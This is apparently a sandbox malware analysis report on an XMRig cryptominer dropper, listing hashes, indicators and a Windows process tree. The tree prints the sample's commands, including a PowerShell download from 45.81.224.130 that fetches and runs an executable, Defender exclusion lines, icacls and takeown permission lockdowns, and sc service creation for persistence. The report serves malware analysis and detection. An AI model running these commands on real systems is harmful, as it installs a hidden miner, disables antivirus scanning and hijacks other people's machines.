xmrig | 39b66a47affa0edde59d74760fc17de28c0d3cbabe7469d382a721ea91b5c123

Analysis

max time kernel
141s
max time network
151s
platform
windows7_x64
resource
win7-20220414-en
submitted
13-05-2022 05:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c671c024595fbae1bcb523930b41952a.exe
Size

6.7MB
MD5

c671c024595fbae1bcb523930b41952a
SHA1

af16bda06ebf490087aac1e444e25017e180c7d4
SHA256

39b66a47affa0edde59d74760fc17de28c0d3cbabe7469d382a721ea91b5c123
SHA512

fb1d9e0488eb247c54b86a0fbb7f1929d6ead0de3502d44e5db701aff3b3df0d7b312939e02bb89790006ea4337dc63b973ce5a2971e132a4188d003ddc95a3b

Score

10^/10

xmrig discovery evasion exploit miner persistence suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://45.81.224.130/any.exe

Signatures

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
\Windows\Tasks\ApplicationsFrameHost.exe	xmrig
C:\Windows\Tasks\ApplicationsFrameHost.exe	xmrig
C:\Windows\Tasks\ApplicationsFrameHost.exe	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2040 powershell.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

flow	pid	process
4	2040	powershell.exe

Executes dropped EXE 13 IoCs

Processes:

migrate.exeWmiic.exeWmiic.exeWmiic.exeIntelConfigService.exeWrap.exeApplicationsFrameHost.exeSuperfetch.exeMSTask.exe~Ma4650.exeany.exewininit.exe

pid	process
864	migrate.exe
1804	Wmiic.exe
848	Wmiic.exe
464
820	Wmiic.exe
1316	IntelConfigService.exe
1700	Wrap.exe
1728	ApplicationsFrameHost.exe
1060	Superfetch.exe
1428	MSTask.exe
756	~Ma4650.exe
1196	any.exe
776	wininit.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Possible privilege escalation attempt 18 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1496	icacls.exe
844	icacls.exe
1776	icacls.exe
2040	icacls.exe
1292	icacls.exe
1636	icacls.exe
1644	icacls.exe
1556	icacls.exe
1916	icacls.exe
948	icacls.exe
1532	icacls.exe
972	takeown.exe
1932	icacls.exe
2016	icacls.exe
1760	icacls.exe
584	icacls.exe
604	icacls.exe
1960	icacls.exe

Loads dropped DLL 18 IoCs

Processes:

cmd.execmd.exeWmiic.exeIntelConfigService.execmd.exeMSTask.exe~Ma4650.exe

pid	process
2000	cmd.exe
1660	cmd.exe
1660	cmd.exe
1260
1660	cmd.exe
1636
820	Wmiic.exe
1316	IntelConfigService.exe
1880	cmd.exe
1316	IntelConfigService.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
756	~Ma4650.exe
756	~Ma4650.exe
756	~Ma4650.exe
2000	cmd.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1496	icacls.exe
844	icacls.exe
2016	icacls.exe
1532	icacls.exe
1960	icacls.exe
1760	icacls.exe
1556	icacls.exe
1916	icacls.exe
604	icacls.exe
948	icacls.exe
584	icacls.exe
972	takeown.exe
1932	icacls.exe
1644	icacls.exe
1776	icacls.exe
2040	icacls.exe
1292	icacls.exe
1636	icacls.exe

AutoIT Executable 6 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
\Windows\Tasks\IntelConfigService.exe	autoit_exe
C:\Windows\Tasks\IntelConfigService.exe	autoit_exe
C:\windows\tasks\IntelConfigService.exe	autoit_exe
C:\Windows\Tasks\Superfetch.exe	autoit_exe
\Windows\Tasks\Superfetch.exe	autoit_exe
C:\Windows\Tasks\Superfetch.exe	autoit_exe

Drops file in Windows directory 29 IoCs

Processes:

migrate.exeany.exepowershell.exeIntelConfigService.exeApplicationsFrameHost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\MSTask.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\Wrap.exe	migrate.exe
File created	C:\Windows\Migration\__tmp_rar_sfx_access_check_7105861	any.exe
File created	C:\Windows\Tasks\run.bat	migrate.exe
File opened for modification	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File opened for modification	C:\Windows\Migration\wininit.exe	any.exe
File created	C:\Windows\Tasks\MSTask.exe	migrate.exe
File created	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File created	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File created	C:\Windows\Tasks\__tmp_rar_sfx_access_check_7088919	migrate.exe
File created	C:\Windows\Tasks\config.json	migrate.exe
File created	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File created	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File created	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File created	C:\Windows\Migration\system.conf	any.exe
File created	C:\Windows\Migration\wininit.exe	any.exe
File opened for modification	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File opened for modification	C:\Windows\Migration\system.conf	any.exe
File opened for modification	C:\Windows\Migration\any.bat	any.exe
File opened for modification	C:\Windows\Tasks\config.json	migrate.exe
File opened for modification	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File created	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\run.bat	migrate.exe
File created	\??\c:\windows\migration\any.exe	powershell.exe
File opened for modification	C:\Windows\Tasks	IntelConfigService.exe
File opened for modification	C:\Windows\Tasks\config.json	ApplicationsFrameHost.exe
File created	C:\Windows\Migration\any.bat	any.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

2044 timeout.exe
844 timeout.exe
976 timeout.exe
844 timeout.exe
280 timeout.exe
472 timeout.exe
1512 timeout.exe
1920 timeout.exe
1624 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

624 tasklist.exe
1556 tasklist.exe

pid	process
2044	timeout.exe
844	timeout.exe
976	timeout.exe
844	timeout.exe
280	timeout.exe
472	timeout.exe
1512	timeout.exe
1920	timeout.exe
1624	timeout.exe

pid	process
624	tasklist.exe
1556	tasklist.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

~Ma4650.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe

Modifies data under HKEY_USERS 17 IoCs

Processes:

~Ma4650.exeMSTask.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	MSTask.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	MSTask.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MSTask.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft	~Ma4650.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeIntelConfigService.exeSuperfetch.exe~Ma4650.exe

pid	process
1968	powershell.exe
1804	powershell.exe
2040	powershell.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1060	Superfetch.exe
756	~Ma4650.exe
756	~Ma4650.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1060	Superfetch.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

~Ma4650.exe

pid process

756 ~Ma4650.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
756	~Ma4650.exe

pid	process
464

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exetasklist.exepowershell.exeApplicationsFrameHost.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	624	tasklist.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeLockMemoryPrivilege	1728	ApplicationsFrameHost.exe
Token: SeDebugPrivilege	1556	tasklist.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

IntelConfigService.exeSuperfetch.exeApplicationsFrameHost.exe

pid	process
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1316	IntelConfigService.exe
1060	Superfetch.exe
1060	Superfetch.exe
1060	Superfetch.exe
1728	ApplicationsFrameHost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

~Ma4650.exe

pid process

756 ~Ma4650.exe
756 ~Ma4650.exe
756 ~Ma4650.exe

pid	process
756	~Ma4650.exe
756	~Ma4650.exe
756	~Ma4650.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c671c024595fbae1bcb523930b41952a.execmd.execmd.exe

description	pid	process	target process
PID 1160 wrote to memory of 1968	1160	c671c024595fbae1bcb523930b41952a.exe	powershell.exe
PID 1160 wrote to memory of 1968	1160	c671c024595fbae1bcb523930b41952a.exe	powershell.exe
PID 1160 wrote to memory of 1968	1160	c671c024595fbae1bcb523930b41952a.exe	powershell.exe
PID 1160 wrote to memory of 1968	1160	c671c024595fbae1bcb523930b41952a.exe	powershell.exe
PID 1160 wrote to memory of 1996	1160	c671c024595fbae1bcb523930b41952a.exe	cmd.exe
PID 1160 wrote to memory of 1996	1160	c671c024595fbae1bcb523930b41952a.exe	cmd.exe
PID 1160 wrote to memory of 1996	1160	c671c024595fbae1bcb523930b41952a.exe	cmd.exe
PID 1160 wrote to memory of 1996	1160	c671c024595fbae1bcb523930b41952a.exe	cmd.exe
PID 1996 wrote to memory of 2000	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2000	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2000	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2000	1996	cmd.exe	cmd.exe
PID 2000 wrote to memory of 776	2000	cmd.exe	chcp.com
PID 2000 wrote to memory of 776	2000	cmd.exe	chcp.com
PID 2000 wrote to memory of 776	2000	cmd.exe	chcp.com
PID 2000 wrote to memory of 776	2000	cmd.exe	chcp.com
PID 2000 wrote to memory of 1804	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 1804	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 1804	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 1804	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 624	2000	cmd.exe	tasklist.exe
PID 2000 wrote to memory of 624	2000	cmd.exe	tasklist.exe
PID 2000 wrote to memory of 624	2000	cmd.exe	tasklist.exe
PID 2000 wrote to memory of 624	2000	cmd.exe	tasklist.exe
PID 2000 wrote to memory of 1196	2000	cmd.exe	find.exe
PID 2000 wrote to memory of 1196	2000	cmd.exe	find.exe
PID 2000 wrote to memory of 1196	2000	cmd.exe	find.exe
PID 2000 wrote to memory of 1196	2000	cmd.exe	find.exe
PID 2000 wrote to memory of 972	2000	cmd.exe	takeown.exe
PID 2000 wrote to memory of 972	2000	cmd.exe	takeown.exe
PID 2000 wrote to memory of 972	2000	cmd.exe	takeown.exe
PID 2000 wrote to memory of 972	2000	cmd.exe	takeown.exe
PID 2000 wrote to memory of 1920	2000	cmd.exe	timeout.exe
PID 2000 wrote to memory of 1920	2000	cmd.exe	timeout.exe
PID 2000 wrote to memory of 1920	2000	cmd.exe	timeout.exe
PID 2000 wrote to memory of 1920	2000	cmd.exe	timeout.exe
PID 2000 wrote to memory of 2040	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 2040	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 2040	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 2040	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1292	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1292	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1292	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1292	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1932	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1932	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1932	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1932	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1496	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1496	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1496	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1496	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 844	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 844	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 844	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 844	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1636	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1636	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1636	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1636	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1644	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1644	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1644	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 1644	2000	cmd.exe	icacls.exe

C:\Users\Admin\AppData\Local\Temp\c671c024595fbae1bcb523930b41952a.exe
"C:\Users\Admin\AppData\Local\Temp\c671c024595fbae1bcb523930b41952a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:1196

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:972

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1920

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2040

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1292

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1932

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1496

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:844

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1636

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1644

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:280

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:864

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1776

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1556

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1916

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Users:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:604

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:948

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "%domain%Admin:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1532

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1960

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\windows\tasks\run.bat" "
5⤵
- Loads dropped DLL
PID:1660

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:2044

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
6⤵
- Executes dropped EXE
PID:1804

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1624

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic" start WMService
6⤵
- Executes dropped EXE
PID:848

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 2 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:844

C:\Windows\SysWOW64\net.exe
net start WMService
6⤵
PID:1280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start WMService
7⤵
PID:1364

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="block vilnerabliti" dir=in protocol=TCP localport=88 action=block
6⤵
PID:624

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
6⤵
PID:1692

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"
4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1512

\??\c:\windows\migration\any.exe
c:\windows\migration\any.exe
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1196

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\windows\migration\any.bat" "
5⤵
PID:968

C:\Windows\SysWOW64\sc.exe
Sc create TaskSc binPath="C:\programdata\wininit.exe --service" DisplayName="Task Schedubler" type=own start=auto
6⤵
PID:1044

C:\Windows\SysWOW64\sc.exe
Sc create TaskSc binPath= "C:\programdata\wininit.exe --service" DisplayName= "Task Schedubler" type= own start= auto
6⤵
PID:1492

C:\Windows\SysWOW64\net.exe
net start TaskSc
6⤵
PID:684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start TaskSc
7⤵
PID:848

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 15 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:844

C:\Windows\SysWOW64\net.exe
net stop TaskSc
6⤵
PID:584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
7⤵
PID:1660

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:976

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:992

C:\windows\tasks\Wmiic.exe
C:\windows\tasks\Wmiic.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:820

C:\windows\tasks\IntelConfigService.exe
"IntelConfigService.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1316

C:\Windows\Tasks\Wrap.exe
C:\Windows\Tasks\Wrap.exe
3⤵
- Executes dropped EXE
PID:1700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
4⤵
- Loads dropped DLL
PID:1880

C:\Windows\Tasks\ApplicationsFrameHost.exe
C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
3⤵
PID:2020

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "WYZSGDWS$:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
3⤵
PID:1312

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
3⤵
PID:1692

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:584

C:\Windows\Tasks\Superfetch.exe
C:\Windows\Tasks\Superfetch.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1060

C:\Windows\Tasks\MSTask.exe
C:\Windows\Tasks\MSTask.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:1428

C:\Windows\TEMP\~Mp49ED.tmp\~Ma4650.exe
"C:\Windows\TEMP\~Mp49ED.tmp\~Ma4650.exe" /p"C:\Windows\Tasks\MSTask.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
